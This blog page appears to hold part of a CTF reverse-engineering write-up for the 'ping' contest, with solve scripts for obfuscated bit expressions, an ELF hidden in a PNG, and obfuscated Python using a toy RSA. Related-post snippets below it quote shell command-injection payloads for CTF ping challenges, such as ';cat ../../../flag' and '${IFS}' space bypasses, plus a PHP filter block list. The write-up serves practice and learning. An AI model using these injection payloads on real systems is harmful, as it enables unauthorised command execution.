v19[27] = (dword_4052C8 | ((dword_4052CC | ((dword_4052C4 & ~((dword_4052C8 | ~((dword_4052CC & (~(dword_4052C8 ^ ((dword_4052C4 & ~(dword_4052C8 ^ dword_4052C4 & ((dword_4052C4 | ~(dword_4052CC ^ ((dword_4052CC | ~(dword_4052C4 ^ v16 & ((~dword_4052C8 | v22[27]) >> dword_4052D0))) >> dword_4052CC << dword_4052D0))) << dword_4052C8))) << dword_4052D0 << dword_4052CC)) >> dword_4052C8 >> dword_4052C4)) << dword_4052CC)) >> dword_4052CC)) >> dword_4052D0)) << dword_4052C4 << dword_4052C4 << dword_4052C4 << dword_4052C8))

v19[28] = (v17 & (dword_4052C8 | (~(dword_4052C8 | (~(dword_4052C4 ^ ((v7 | ((dword_4052D0 & (dword_4052C4 ^ (((dword_4052C4 ^ (((dword_4052C4 & (v22[28] << dword_4052C4 >> dword_4052C8)) << dword_4052CC) >> dword_4052C8 << dword_4052C8)) << dword_4052CC << dword_4052C4 << dword_4052C8) >> dword_4052C8))) >> dword_4052D0)) >> dword_4052D0 << dword_4052C4)) << dword_4052D0)) << dword_4052CC))) >> dword_4052C4

v19[29] = (dword_4052C4 | ((dword_4052D0 ^ (dword_4052CC | (((v15 & ((dword_4052D0 & ((dword_4052C4 & (dword_4052D0 ^ (~(v15 & (dword_4052D0 | ((dword_4052D0 ^ (v22[29] >> dword_4052C8)) >> dword_4052C4))) >> dword_4052C4 << dword_4052C4))) >> dword_4052D0 << dword_4052C8)) << dword_4052C4)) << dword_4052C8 << dword_4052C8) >> dword_4052D0 >> dword_4052D0))) << dword_4052CC))

v19[30] = (dword_4052C4 ^ ((v14 | ((v14 | dword_4052CC ^ ((v10 | ((dword_4052C8 & ((dword_4052C4 ^ (v14 << dword_4052C4 >> dword_4052C8 >> dword_4052C4 << dword_4052C4)) << dword_4052D0 << dword_4052C8 << dword_4052D0)) << dword_4052C4 << dword_4052CC)) >> dword_4052C4)) >> dword_4052C8)) << dword_4052CC))

v19[31] = (dword_4052CC | ((dword_4052CC & (~(dword_4052CC & (dword_4052C8 ^ (dword_4052CC | dword_4052D0 & ~((dword_4052D0 | ((v6 | ~((((dword_4052C4 ^ (v22[31] >> dword_4052D0)) << dword_4052D0) | v17) << dword_4052D0 << dword_4052D0)) >> dword_4052D0 >> dword_4052C4 << dword_4052D0 << dword_4052C8 >> dword_4052C4)) >> dword_4052C8 << dword_4052D0 << dword_4052C8)))) >> dword_4052CC)) << dword_4052D0))

v19[32] = (((dword_4052D0 & (dword_4052C4 | dword_4052CC ^ (dword_4052C8 | ((dword_4052D0 | ((dword_4052C8 | ((dword_4052CC | ~(dword_4052C4 << dword_4052C8 << dword_4052C8 >> dword_4052C4)) >> dword_4052CC >> dword_4052D0)) >> dword_4052C4)) >> dword_4052D0))) | dword_4052CC) << dword_4052D0) | dword_4052C8)

v19[33] = ~(dword_4052CC ^ dword_4052C4 ^ (~(~(dword_4052D0 & ~dword_4052C8) & dword_4052D0 | dword_4052D0 | dword_4052CC | dword_4052C4) << dword_4052D0))

print(bytes([i&0xff for i in v19]))
#ping{r3m3mb3r_70_h1d3_ur_d3bu993r}

imag-ine-an-elf

题目说了elf在图片里,直接zsteg解出

┌──(kali㉿kali)-[~/ctf/1223]
└─$ zsteg elf.png -E 'b1,g,lsb,xy' > a.elf

加密也巨简单

    v3[30] = 36;
    v3[31] = 4933;
    v3[32] = 35;
    v3[33] = 78;
    for ( i = 0; i <= 33; ++i )
    {
      if ( (i & 1) != 0 )
      {
        if ( i % 3 )
        {
          if ( i % 5 )
          {
            if ( (a1[i] ^ 0x1337) != v3[i] )
            {
LABEL_14:
              puts("Wrong!");
              return v4 - __readfsqword(0x28u);
            }
          }
          else if ( a1[i] + 5 != v3[i] )
          {
            goto LABEL_14;
          }
        }
        else if ( (char)(a1[i] ^ 0x33) != v3[i] )
        {
          goto LABEL_14;
        }
      }
      else if ( a1[i] - 16 != v3[i] )
      {
        goto LABEL_14;
      }
    }
    printf("Correct! The flag is: %s\n", a1);
  }
  else
  {
    puts("Wrong!");
  }

v3 = [96,4958,94,84,107,114,33,4866,51,108,36,4953,84,4968,98,0,70,4968,103,4868,92,95,79,4931,88,57,68,6,79,4933,36,4933,35,78]
for i in range(33):
    if i%2 !=0:
      if i%3 != 0:
        if i%5 != 0 :
          v3[i] ^= 0x1337
        else:
          v3[i] -= 5
      else:
        v3[i] ^= 0x33
    else:
      v3[i] +=16

print(bytes(v3))
#b'ping{m15C_4nd_r3V_w3ll_th4T5_r4r3N'

python-rev-for-freaks

python博大精深,算是领教了,看不懂。给的是exec(b64decode(....))一步步解,最后得到一堆python代码:

𝓿 = 𝓉𝔂𝓹𝓮("m", (), {"__init__": lambda 𝔞, b: 𝓈𝔢t𝒶𝓽t𝓻(𝒶, "b", 𝔟), "s": lambda 𝒶, b: 𝔳(𝔟(𝔞.𝒷).𝓫)})
𝒸 = 𝔱𝓎𝓹𝓮("l", (), {"__init__": lambda 𝔞, 𝔟: 𝔰𝑒𝓽a𝓉𝓉𝔯(a, "b", 𝓫), "d": lambda a, 𝔟: 𝔞 if 𝓋(a.𝒷).s(𝒷).𝔟 != b(a.𝔟).𝓫 else b(𝔞.𝔟)})
𝔪 = lambda 𝔵: 𝔠(f"{𝓵𝔦𝓈𝔱(𝓏𝔦𝔭([𝓁(𝔦 + 5*𝔦) for i in 𝔁], [𝔩(𝔦 + 𝓲) for 𝔦 in 𝔵][::-1]))[::-1] = }")
𝔫 = lambda x: 𝒸("{x[';]:=^450}".form𝒶𝓽(𝔵={"';": 𝔵}))
𝔩 = lambda 𝔁: (12648430 ^ (𝔵 + 3735928559)) * 3862272608
𝓀 = 𝓲n𝔭𝔲𝓽("Insert your flag: ")
𝓈 = [(lambda 𝔷, f, x, 𝔫: 𝓍 if 𝓷 == 0 else 𝔣(𝔷, 𝒻, (lambda 𝓶, 𝓃: (lambda 𝓍: 𝒾n𝔱(𝔁[l𝔢𝔫(𝔵)-59:], 2) + 𝒾𝓷𝓽(𝔵[:𝔩𝓮n(𝔁)-59], 2) if 𝔩e𝔫(𝔁)-59 > 0 else 𝔦n𝓽(𝔵,2))(b𝒾𝔫(𝓶 * 𝓷)))(𝔁, 𝔃), n - 1))(𝔰𝔲𝓂((o𝔯𝔡(𝔨[𝓲+𝒿]) << 𝒿*7) if i+j < l𝔢𝔫(𝓴) else (127 << 𝒿*7) for 𝔧 in 𝓇𝔞n𝑔𝔢(8)), (lambda 𝔷, 𝓯, x, 𝔫: x if 𝔫 == 0 else f(𝔷, 𝓯, (lambda 𝔫, 𝔪: (lambda 𝔵: in𝔱(x[𝓁e𝔫(𝓍)-59:], 2) + 𝓲nt(𝔁[:𝓁𝑒𝔫(𝔵)-59], 2) if 𝓵𝑒𝔫(𝓍)-59 > 0 else 𝒾n𝓽(x,2))(𝓫𝔦𝔫(𝓷 * 𝔪)))(𝔁, 𝔷), 𝔫 - 1)), 1, 420_69) for 𝔦 in 𝓇a𝓷𝑔e(0, 𝓁𝔢𝓷(𝔨), 8)]
print(𝓬(s).𝔡(𝔪).𝒹(𝔫).b)
if 𝓬(s).𝔡(𝔪).𝒹(𝔫).b == "=𝓵𝔦𝓈𝔱(𝓏𝔦𝔭([𝓁(𝔦 + 5*𝔦) for i in 𝔁], [𝔩(𝔦 + 𝓲) for 𝔦 in 𝔵][::-1]))[::-1] = [(13969439442922757926633137632, 3251133470245911671632840864), (6919844817045365871489845728, 3067821989026578174692487328), (11408842561461143227463443808, 3766356150094573135206359136), (11299068421490417286376379488, 3802947530149782083826679648), (9203465938188223031329433888, 2306614948612889330244181216), (9753400381846729757945770272, 4656479823873291748257812704)]==":
    𝔭𝓻i𝓷t("Good flag!")
else:
    𝓹r𝔦𝔫𝔱("Wrong flag!")

python不只可以识别这些符号而且还能当成正常字符处理。按WP大至理解一下:

加密分3步,

1是每8个1组按7位ascii码2进制连一起,高位补127,

2是作个rsa运算,通过lambda造了个n=2^{59}-1

3比较简单加异或再乘

最后把正反两次作的结果反转后比较

'''
1,每ascii取7位,每组8个,最后加1111111
𝔰𝔲𝓂((o𝔯𝔡(𝔨[𝓲+𝒿]) << 𝒿*7) if i+j < l𝔢𝔫(𝓴) else (127 << 𝒿*7) for 𝔧 in 𝓇𝔞n𝑔𝔢(8))
2,e = 42069  n= 2**59-1 RSA  pow(m,e,n)
int(x,2)(bin(n*m))
(lambda 𝔫, 𝔪: (lambda 𝔵: in𝔱(x[𝓁e𝔫(𝓍)-59:], 2) + 𝓲nt(𝔁[:𝓁𝑒𝔫(𝔵)-59], 2) if 𝓵𝑒𝔫(𝓍)-59 > 0 else 𝒾n𝓽(x,2))(𝓫𝔦𝔫(𝓷 * 𝔪)))

len(x)<59
𝓈 = [(lambda 𝔷, f, x, 𝔫: 𝓍 if 𝓷 == 0 else 𝔣(𝔷, 𝒻, (lambda 𝓶, 𝓃: (int(x,2))(bin(m*n)))(𝔁, 𝔃), n - 1))
 (sum((ord(f[i+j]) << j*7) if i+j < len(k) else (127 << j*7) for for i in range(8)), 
 (lambda 𝔷, 𝓯, x, 𝔫: x if 𝔫 == 0 else f(𝔷, 𝓯, (int(x,2))(bin(n*m)))(x, z), n - 1)), 1, 42069) for i in range(0, len(t), 8)]
3,
lambda 𝔁: (12648430 ^ (𝔵 + 3735928559)) * 3862272608
'''
good = [(13969439442922757926633137632, 3251133470245911671632840864), (6919844817045365871489845728, 3067821989026578174692487328), (11408842561461143227463443808, 3766356150094573135206359136), (11299068421490417286376379488, 3802947530149782083826679648), (9203465938188223031329433888, 2306614948612889330244181216), (9753400381846729757945770272, 4656479823873291748257812704)]
n = 2**59-1 
p,q = 3203431780337,179951
e = 42069
d = invert(e, (p-1)*(q-1))
flag = ''
for i in good:
    v = (((i[1]//3862272608)^12648430)-3735928559)//2
    v = pow(v,d,n)
    flag+=''.join([chr((v>>j*7)&0x7f) for j in range(8)])
print(flag)
#'ping{W0w_y0U_rYl1y_g0oD_4t_Py7h0n_c0nGr4Tz}\x7f\x7f\x7f\x7f\x7f'

石氏是时试
关注
  • 21
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9424
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9635
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTF入门笔记之ping
qq_37410729的博客
11-02 4034
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
CTF目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1497
ctf获取flag入门
CTF——ping相关
jklw4的博客
09-12 4151
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping
ctf-ping命令执行
qq_45414878的博客
11-08 9368
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
中学生CTF 平台Ping Write Up
Ju0se
04-05 3235
地址:http://198.13.45.199:5005/ 明显是一道命令执行的目。 来说一下被ban的内容都有啥。 ls、cat、flag、php、>、| 以及数字点和空格 通过反引号包裹whoami后成功执行。 此时需要通过a="l";b="s";c=$a$b;$c来执行ls命令。 同时还需要包含在反引号内 127.0.0.1;`...
CTF关于ping命令注入问(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当空格来用; 利用截断符号配合普通命令简单问基本就出来; 例如:ip=127.0.0.1...
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6492
BUUCTFWP,关于一些waf的绕过
ctf-ping命令执行绕过
bamanju0574的博客
09-10 4864
目连接:http://ctf.klmyssn.com/challenges#Ping 命令执行绕过,试了试过滤了一些:一些命令 但是反引号可以执行命令 通过拼接,可以拼接出来:ls 命令 127.0.0.1;`a="l";b="s";c=$a$b;$c` 可以发现 flag就是下面那一串flag_ 开头的字符串 在拼接命令来...
linux聊天系统,采用微信小程序与PC端双端开发。
06-15
后台采用apache服务器下的cgi处理c语言做微信小程序后台逻辑的脚本映射。PC端的服务器和客户端都是基于c语言写的。采用mysql数据库进行用户数据和聊天记录的存储。.zip C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。下面详细介绍C语言的基本概念和语法。 1. 变量和数据类型 在C语言中,变量用于存储数据,数据类型用于定义变量的类型和范围。C语言支持多种数据类型,包括基本数据类型(如int、float、char等)和复合数据类型(如结构体、联合等)。 2. 运算符 C语言中常用的运算符包括算术运算符(如+、、、/等)、关系运算符(如==、!=、、=、<、<=等)、逻辑运算符(如&&、||、!等)。此外,还有位运算符(如&、|、^等)和指针运算符(如、等)。 3. 控制结构 C语言中常用的控制结构包括if语句、循环语句(如for、while等)和switch语句。通过这些控制结构,可以实现程序的分支、循环和多路选择等功能。 4. 函数 函数是C语言中用于封装代码的单元,可以实现代码的复用和模块化。C语言中定义函数使用关键字“void”或返回值类型(如int、float等),并通过“{”和“}”括起来的代码块来实现函数的功能。 5. 指针 指针是C语言中用于存储变量地址的变量。通过指针,可以实现对内存的间接访问和修改。C语言中定义指针使用星号()符号,指向数组、字符串和结构体等数据结构时,还需要注意数组名和字符串常量的特殊性质。 6. 数组和字符串 数组是C语言中用于存储同类型数据的结构,可以通过索引访问和修改数组中的元素。字符串是C语言中用于存储文本数据的特殊类型,通常以字符串常量的形式出现,用双引号("...")括起来,末尾自动添加'\0'字符。 7. 结构体和联合 结构体和联合是C语言中用于存储不同类型数据的复合数据类型。结构体由多个成员组成,每个成员可以是不同的数据类型;联合由多个变量组成,它们共用同一块内存空间。通过结构体和联合,可以实现数据的封装和抽象。 8. 文件操 C语言中通过文件操函数(如fopen、fclose、fread、fwrite等)实现对文件的读写操。文件操函数通常返回文件指针,用于表示打开的文件。通过文件指针,可以进行文件的定位、读写等操。 总之,C语言是一种功能强大、灵活高效的编程语言,广泛应用于各种领域。掌握C语言的基本语法和数据结构,可以为编程学习和实践打下坚实的基础。
基于Cartographer的室内SLAM系统研究与实现
06-15
本文研究了谷歌的Cartographer室内SLAM算法,为了提高其建图和定位的精确度对算法进行了改进。
示例代码:spring actuator添加自定义endpoint
06-15
示例代码:spring actuator添加自定义endpoint
关于Windows 9x的vmm32问解决方法
06-15
关于Windows 9x的vmm32问解决方法
基于JSP+Servlet的房源出租管理系统,适合毕业设计 和 大业.zip
06-15
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可为毕设项目、课程设计、业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可为毕设项目、课程设计、业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
算法设计与分析 实验二 分治法求最近点对
06-15
算法设计与分析 实验二 分治法求最近点对
git忽略文件的配置文件
最新发布
06-15
git忽略文件
基于c语言开发的相关lib库,主要依赖第三方库,及对其进行封装.zip
06-15
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。下面详细介绍C语言的基本概念和语法。 1. 变量和数据类型 在C语言中,变量用于存储数据,数据类型用于定义变量的类型和范围。C语言支持多种数据类型,包括基本数据类型(如int、float、char等)和复合数据类型(如结构体、联合等)。 2. 运算符 C语言中常用的运算符包括算术运算符(如+、、、/等)、关系运算符(如==、!=、、=、<、<=等)、逻辑运算符(如&&、||、!等)。此外,还有位运算符(如&、|、^等)和指针运算符(如、等)。 3. 控制结构 C语言中常用的控制结构包括if语句、循环语句(如for、while等)和switch语句。通过这些控制结构,可以实现程序的分支、循环和多路选择等功能。 4. 函数 函数是C语言中用于封装代码的单元,可以实现代码的复用和模块化。C语言中定义函数使用关键字“void”或返回值类型(如int、float等),并通过“{”和“}”括起来的代码块来实现函数的功能。 5. 指针 指针是C语言中用于存储变量地址的变量。通过指针,可以实现对内存的间接访问和修改。C语言中定义指针使用星号()符号,指向数组、字符串和结构体等数据结构时,还需要注意数组名和字符串常量的特殊性质。 6. 数组和字符串 数组是C语言中用于存储同类型数据的结构,可以通过索引访问和修改数组中的元素。字符串是C语言中用于存储文本数据的特殊类型,通常以字符串常量的形式出现,用双引号("...")括起来,末尾自动添加'\0'字符。 7. 结构体和联合 结构体和联合是C语言中用于存储不同类型数据的复合数据类型。结构体由多个成员组成,每个成员可以是不同的数据类型;联合由多个变量组成,它们共用同一块内存空间。通过结构体和联合,可以实现数据的封装和抽象。 8. 文件操 C语言中通过文件操函数(如fopen、fclose、fread、fwrite等)实现对文件的读写操。文件操函数通常返回文件指针,用于表示打开的文件。通过文件指针,可以进行文件的定位、读写等操。 总之,C语言是一种功能强大、灵活高效的编程语言,广泛应用于各种领域。掌握C语言的基本语法和数据结构,可以为编程学习和实践打下坚实的基础。
计算机毕业设计-asp网上体育用品商店的设计与实现(LW+源代码).zip
06-15
计算机毕业设计资源包含(项目部署视频+源码+LW+开报告等等),所有项目经过助教老师跑通,有任何问可以私信博主解决,可以免费帮部署。
一个利用51单片机来实现音乐播放的小程序.zip
06-15
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可为毕设项目、课程设计、业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可为毕设项目、课程设计、业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值